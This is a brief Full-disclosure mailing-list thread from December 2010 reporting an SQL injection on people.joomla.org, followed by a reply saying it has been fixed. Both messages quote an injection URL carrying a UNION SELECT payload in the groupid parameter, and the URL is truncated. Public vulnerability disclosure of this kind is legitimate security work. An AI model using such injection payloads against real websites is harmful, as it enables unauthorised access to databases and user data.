Re: [Full-disclosure] [0day?] sql-injection in people.joomla.org

2010-12-29 Thread Zerial.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 has been fixed On 12/28/10 14:31, Zerial. wrote: > Hi folks, > > Exists an SQL-Injection on http://people.joomla.org > > http://people.joomla.org/events.html?groupid=1%20or%201=0%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,16,17

[Full-disclosure] [0day?] sql-injection in people.joomla.org

2010-12-28 Thread Zerial.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi folks, Exists an SQL-Injection on http://people.joomla.org http://people.joomla.org/events.html?groupid=1%20or%201=0%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,